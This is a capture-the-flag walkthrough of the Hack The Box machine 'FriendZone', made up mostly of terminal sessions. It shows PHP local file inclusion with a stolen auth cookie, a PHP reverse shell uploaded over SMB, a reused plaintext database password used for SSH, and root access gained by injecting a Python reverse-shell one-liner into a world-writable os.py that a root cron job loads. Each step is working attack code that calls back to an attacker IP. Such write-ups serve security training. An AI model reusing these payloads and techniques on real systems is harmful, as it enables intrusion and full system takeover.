u505@kali:~/HTB/Machines/FriendZone$ echo -n "PD9waHAKCgokdGltZV9maW5hbCA9IHRpbWUoKSArIDM2MDA7CgplY2hvICJGaW5hbCBBY2Nlc3MgdGltZXN0YW1wIGlzICR0aW1lX2ZpbmFsIjsKCgo/Pgo=" | base64 -d <?php
$time_final = time() + 3600;
echo "Final Access timestamp is $time_final";
?>
We try with dashboard
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard u505@kali:~/HTB/Machines/FriendZone$ echo -n "PD9waHAKCi8vZWNobyAiPGNlbnRlcj48aDI+U21hcnQgcGhvdG8gc2NyaXB0IGZvciBmcmllbmR6b25lIGNvcnAgITwvaDI+PC9jZW50ZXI+IjsKLy9lY2hvICI8Y2VudGVyPjxoMz4qIE5vdGUgOiB3ZSBhcmUgZGVhbGluZyB3aXRoIGEgYmVnaW5uZXIgcGhwIGRldmVsb3BlciBhbmQgdGhlIGFwcGxpY2F0aW9uIGlzIG5vdCB0ZXN0ZWQgeWV0ICE8L2gzPjwvY2VudGVyPiI7CmVjaG8gIjx0aXRsZT5GcmllbmRab25lIEFkbWluICE8L3RpdGxlPiI7CiRhdXRoID0gJF9DT09LSUVbIkZyaWVuZFpvbmVBdXRoIl07CgppZiAoJGF1dGggPT09ICJlNzc0OWQwZjRiNGRhNWQwM2U2ZTkxOTZmZDFkMThmMSIpewogZWNobyAiPGJyPjxicj48YnI+IjsKCmVjaG8gIjxjZW50ZXI+PGgyPlNtYXJ0IHBob3RvIHNjcmlwdCBmb3IgZnJpZW5kem9uZSBjb3JwICE8L2gyPjwvY2VudGVyPiI7CmVjaG8gIjxjZW50ZXI+PGgzPiogTm90ZSA6IHdlIGFyZSBkZWFsaW5nIHdpdGggYSBiZWdpbm5lciBwaHAgZGV2ZWxvcGVyIGFuZCB0aGUgYXBwbGljYXRpb24gaXMgbm90IHRlc3RlZCB5ZXQgITwvaDM+PC9jZW50ZXI+IjsKCmlmKCFpc3NldCgkX0dFVFsiaW1hZ2VfaWQiXSkpewogIGVjaG8gIjxicj48YnI+IjsKICBlY2hvICI8Y2VudGVyPjxwPmltYWdlX25hbWUgcGFyYW0gaXMgbWlzc2VkICE8L3A+PC9jZW50ZXI+IjsKICBlY2hvICI8Y2VudGVyPjxwPnBsZWFzZSBlbnRlciBpdCB0byBzaG93IHRoZSBpbWFnZTwvcD48L2NlbnRlcj4iOwogIGVjaG8gIjxjZW50ZXI+PHA+ZGVmYXVsdCBpcyBpbWFnZV9pZD1hLmpwZyZwYWdlbmFtZT10aW1lc3RhbXA8L3A+PC9jZW50ZXI+IjsKIH1lbHNlewogJGltYWdlID0gJF9HRVRbImltYWdlX2lkIl07CiBlY2hvICI8Y2VudGVyPjxpbWcgc3JjPSdpbWFnZXMvJGltYWdlJz48L2NlbnRlcj4iOwoKIGVjaG8gIjxjZW50ZXI+PGgxPlNvbWV0aGluZyB3ZW50IHdvcm5nICEgLCB0aGUgc2NyaXB0IGluY2x1ZGUgd3JvbmcgcGFyYW0gITwvaDE+PC9jZW50ZXI+IjsKIGluY2x1ZGUoJF9HRVRbInBhZ2VuYW1lIl0uIi5waHAiKTsKIC8vZWNobyAkX0dFVFsicGFnZW5hbWUiXTsKIH0KfWVsc2V7CmVjaG8gIjxjZW50ZXI+PHA+WW91IGNhbid0IHNlZSB0aGUgY29udGVudCAhICwgcGxlYXNlIGxvZ2luICE8L2NlbnRlcj48L3A+IjsKfQo/Pgo=" | base64 -d <?php <br> //echo "<center><h2>Smart photo script for friendzone corp !</h2></center>"; //echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>"; echo "<title>FriendZone Admin !</title>"; $auth = $_COOKIE["FriendZoneAuth"];
if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){ echo "<br><br><br>"; <br> echo "<center><h2>Smart photo script for friendzone corp !</h2></center>"; echo "<center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center>"; <br> if(!isset($_GET["image_id"])){ echo "<br><br>"; echo "<center><p>image_name param is missed !</p></center>"; echo "<center><p>please enter it to show the image</p></center>"; echo "<center><p>default is image_id=a.jpg&pagename=timestamp</p></center>"; }else{ $image = $_GET["image_id"]; echo "<center><img src='images/$image'></center>"; <br> echo "<center><h1>Something went worng ! , the script include wrong param !</h1></center>"; include($_GET["pagename"].".php"); //echo $_GET["pagename"]; } }else{ echo "<center><p>You can't see the content ! , please login !</center></p>"; } ?>
We can add the cookie to curl and call a php page in this case timestamp
u505@kali:~/HTB/Machines/FriendZone$ curl --cookie "FriendZoneAuth=e7749d0f4b4da5d03e6e9196fd1d18f1" -k https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg\&pagename=timestamp <title>FriendZone Admin !</title><br><br><br><center><h2>Smart photo script for friendzone corp !</h2></center><center><h3>* Note : we are dealing with a beginner php developer and the application is not tested yet !</h3></center><center><img src='images/a.jpg'></center><center><h1>Something went worng ! , the script include wrong param !</h1></center>Final Access timestamp is 1582074462
The path of the network share Development is /etc/Development as we found in the nmap discovery. We will upload a phpinfo file to test the execution.
u505@kali:~/HTB/Machines/FriendZone$ cat phpinfo.php <?php phpinfo(); ?> u505@kali:~/HTB/Machines/FriendZone$ smbclient //friendzone/Development Enter WORKGROUP\u505's password: Try "help" to get a list of possible commands. smb: \> put phpinfo.php putting file phpinfo.php as \phpinfo.php (0.2 kb/s) (average 0.2 kb/s) smb: \> quit
If we open
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/phpinfo
We see the execution of our file phpinfo.php
User flag
If we can execute a php file, we can gain a reverse shell.
Create reverse shell file
u505@kali:~/HTB/Machines/FriendZone$ cp /usr/share/webshells/php/php-reverse-shell.php ./ u505@kali:~/HTB/Machines/FriendZone$ vi php-reverse-shell.php u505@kali:~/HTB/Machines/FriendZone$ cat php-reverse-shell.php | grep CHANGE $ip = '10.10.14.26'; // CHANGE THIS $port = 4444; // CHANGE THIS
Push reverse shell to server
u505@kali:~/HTB/Machines/FriendZone$ smbclient //friendzone/Development Enter WORKGROUP\u505's password: Try "help" to get a list of possible commands. smb: \> put php-reverse-shell.php putting file php-reverse-shell.php as \php-reverse-shell.php (45.8 kb/s) (average 45.8 kb/s) smb: \> quit
Raise listener
u505@kali:~/HTB/Machines/FriendZone$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Call script and open reverse shell
u505@kali:~/HTB/Machines/FriendZone$ curl --cookie "FriendZoneAuth=e7749d0f4b4da5d03e6e9196fd1d18f1" -k https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg\&pagename=/etc/Development/php-reverse-shell
And the listener is opened
u505@kali:~/HTB/Machines/FriendZone$ rlwrap nc -lnvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.123. Ncat: Connection from 10.10.10.123:34844. Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 04:05:57 up 12:03, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty; pty.spawn("/bin/bash")' www-data@FriendZone:/$ stty raw -echo stty raw -echo www-data@FriendZone:/$ export TERM=screen
Flag
www-data@FriendZone:/$ cat /home/friend/user.txt <USER_FLAG>
Escalation of privileges
Database access
www-data@FriendZone:/var/www$ ls -ltr
total 28
drwxr-xr-x 3 root root 4096 Oct 6 2018 uploads
drwxr-xr-x 4 root root 4096 Oct 6 2018 friendzone
drwxr-xr-x 2 root root 4096 Oct 6 2018 friendzoneportal
drwxr-xr-x 3 root root 4096 Oct 6 2018 html
-rw-r--r-- 1 root root 116 Oct 6 2018 mysql_data.conf
drwxr-xr-x 2 root root 4096 Jan 15 2019 friendzoneportaladmin
drwxr-xr-x 3 root root 4096 Jan 16 2019 admin
We check the mysql file
www-data@FriendZone:/var/www$ cat mysql_data.conf for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ
We reuse the mysql credentials on ssh and we gain shell access with user friend
u505@kali:~/HTB/Machines/FriendZone/www$ ssh friend@friendzone The authenticity of host 'friendzone (10.10.10.123)' can't be established. ECDSA key fingerprint is SHA256:/CZVUU5zAwPEcbKUWZ5tCtCrEemowPRMQo5yRXTWxgw. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'friendzone,10.10.10.123' (ECDSA) to the list of known hosts. friend@friendzone's password: Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)
* Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch You have mail. Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3 friend@FriendZone:~$ id uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
But this user doesn't give us more access than www-data
Local enumeration
u505@kali:~/HTB/Machines/FriendZone$ mkdir www u505@kali:~/HTB/Machines/FriendZone$ cd www/ u505@kali:~/HTB/Machines/FriendZone/www$ cp /opt/utils/LinEnum/LinEnum.sh ./ u505@kali:~/HTB/Machines/FriendZone/www$ cp /opt/utils/pspy/pspy64 ./ u505@kali:~/HTB/Machines/FriendZone/www$ sudo python -m SimpleHTTPServer 80 [sudo] password for u505: Serving HTTP on 0.0.0.0 port 80 ...
From the target
www-data@FriendZone:/$ cd /tmp www-data@FriendZone:/tmp$ wget -q http://10.10.14.26/LinEnum.sh www-data@FriendZone:/tmp$ wget -q http://10.10.14.26/pspy64 www-data@FriendZone:/tmp$ chmod +x LinEnum.sh pspy64
Crontab job
pspy snoops a cron job
2020/02/19 14:26:01 CMD: UID=0 PID=17082 | /usr/bin/python /opt/server_admin/reporter.py
2020/02/19 14:26:01 CMD: UID=0 PID=17081 | /bin/sh -c /opt/server_admin/reporter.py
2020/02/19 14:26:01 CMD: UID=0 PID=17080 | /usr/sbin/CRON -f
The rights of reporters.py is root, so we cannot modify it.
www-data@FriendZone:/tmp$ ls -l /opt/server_admin/reporter.py
-rwxr--r-- 1 root root 424 Jan 16 2019 /opt/server_admin/reporter.py
The source file
www-data@FriendZone:/tmp$ cat /opt/server_admin/reporter.py #!/usr/bin/python
import os
to_address = "admin1@friendzone.com" from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"
#os.system(command)
# I need to edit the script later # Sam ~ python developer
The script import a library and print a line, the rest is commented an unusable.
We run pspy with file systems events and processes.
www-data@FriendZone:/tmp$ ./pspy64 -fp
...
2020/02/19 14:32:01 FS: OPEN | /usr/bin/python2.7
2020/02/19 14:32:01 FS: ACCESS | /usr/bin/python2.7
2020/02/19 14:32:01 CMD: UID=0 PID=17109 | /usr/bin/python /opt/server_admin/reporter.py
2020/02/19 14:32:01 CMD: UID=0 PID=17108 | /bin/sh -c /opt/server_admin/reporter.py
2020/02/19 14:32:01 CMD: UID=0 PID=17107 | /usr/sbin/CRON -f
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/site.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/site.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/site.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/site.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/os.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/os.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/os.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/os.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/posixpath.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/posixpath.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/posixpath.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/posixpath.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/stat.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/stat.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/stat.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/stat.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/stat.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/genericpath.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/genericpath.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/genericpath.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/genericpath.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/genericpath.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/warnings.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/warnings.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/warnings.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/warnings.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/linecache.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/linecache.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/linecache.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/linecache.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/linecache.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/types.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/types.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/types.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/types.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/types.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/warnings.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/posixpath.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/UserDict.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/UserDict.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/UserDict.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/UserDict.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_abcoll.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_abcoll.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/_abcoll.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_abcoll.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/abc.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/abc.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/abc.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/abc.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_weakrefset.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_weakrefset.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/_weakrefset.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_weakrefset.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_weakrefset.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/abc.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_abcoll.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/UserDict.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/copy_reg.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/copy_reg.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/copy_reg.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/copy_reg.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/copy_reg.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/os.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/traceback.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/traceback.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/traceback.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/traceback.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/traceback.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sysconfig.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sysconfig.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/sysconfig.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sysconfig.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sysconfig.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/re.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/re.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/re.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/re.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_compile.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_compile.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/sre_compile.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_compile.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_parse.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_parse.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/sre_parse.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_parse.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_constants.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sre_constants.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/sre_constants.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_constants.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_constants.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_parse.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sre_compile.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/re.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_sysconfigdata.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/_sysconfigdata.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/_sysconfigdata.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_sysconfigdata.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/plat-x86_64-linux-gnu/_sysconfigdata_nd.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/_sysconfigdata.py
2020/02/19 14:32:01 FS: OPEN DIR | /usr/local/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: OPEN DIR | /usr/local/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/local/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/local/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/local/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/local/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: CLOSE_NOWRITE DIR | /usr/local/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: CLOSE_NOWRITE DIR | /usr/local/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: OPEN DIR | /usr/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: OPEN DIR | /usr/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: ACCESS DIR | /usr/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: CLOSE_NOWRITE DIR | /usr/lib/python2.7/dist-packages
2020/02/19 14:32:01 FS: CLOSE_NOWRITE DIR | /usr/lib/python2.7/dist-packages/
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/sitecustomize.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/sitecustomize.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/sitecustomize.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/site.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/locale/locale-archive
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/__init__.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/__init__.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/encodings/__init__.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/__init__.pyc
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/codecs.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/codecs.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/codecs.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/codecs.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/codecs.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/aliases.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/aliases.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/encodings/aliases.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/aliases.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/aliases.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/__init__.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/utf_8.py
2020/02/19 14:32:01 FS: OPEN | /usr/lib/python2.7/encodings/utf_8.pyc
2020/02/19 14:32:01 FS: ACCESS | /usr/lib/python2.7/encodings/utf_8.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/utf_8.pyc
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/python2.7/encodings/utf_8.py
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/bin/python2.7
2020/02/19 14:32:01 FS: CLOSE_NOWRITE | /usr/lib/locale/locale-archive
Rights of python OS library allow to modify it
www-data@FriendZone:/tmp$ ls -l /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
Modify os.py library
The script reads the file /usr/lib/python2.7/os.py as root, so if we add lines to it, they will be executed as root. So we need to gain a shell with the execution of the crontab.
friend@FriendZone:~$ vi /usr/lib/python2.7/os.py
friend@FriendZone:~$ tail -n 3 /usr/lib/python2.7/os.py
except NameError: # statvfs_result may not exist
pass
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.36",4446));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Raise the listener
u505@kali:~/HTB/Machines/FriendZone$ rlwrap nc -lnvp 4446 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446
Wait until the cron execution, and the reverse shell is openned.
u505@kali:~/HTB/Machines/FriendZone$ rlwrap nc -lnvp 4446 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4446 Ncat: Listening on 0.0.0.0:4446 Ncat: Connection from 10.10.10.123. Ncat: Connection from 10.10.10.123:39988. /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root) # python -c 'import pty; pty.spawn("/bin/bash")' Traceback (most recent call last): File "/usr/lib/python2.7/site.py", line 68, in <module> import os File "/usr/lib/python2.7/os.py", line 743, in <module> import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.26",4446));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); File "/usr/lib/python2.7/socket.py", line 228, in meth return getattr(self._sock,name)(*args) socket.error: [Errno 111] Connection refused
Python fails because of our line in the os.py library. So we remove it.
friend@FriendZone:~$ vi /usr/lib/python2.7/os.py
friend@FriendZone:~$ tail -n 3 /usr/lib/python2.7/os.py
_make_statvfs_result)
except NameError: # statvfs_result may not exist
pass
And set our shell more confortable.
# python -c 'import pty; pty.spawn("/bin/bash")'
root@FriendZone:~# stty raw -echo
stty raw -echo
root@FriendZone:~# export TERM=screen
Root flag
root@FriendZone:~# cat /root/root.txt <ROOT_FLAG>
References
- Local File Inclusion (LFI) — Web Application Penetration Testing
- Tricky ways to exploit PHP Local File Inclusion
Daniel Simao 07:00, 18 February 2020 (EST)
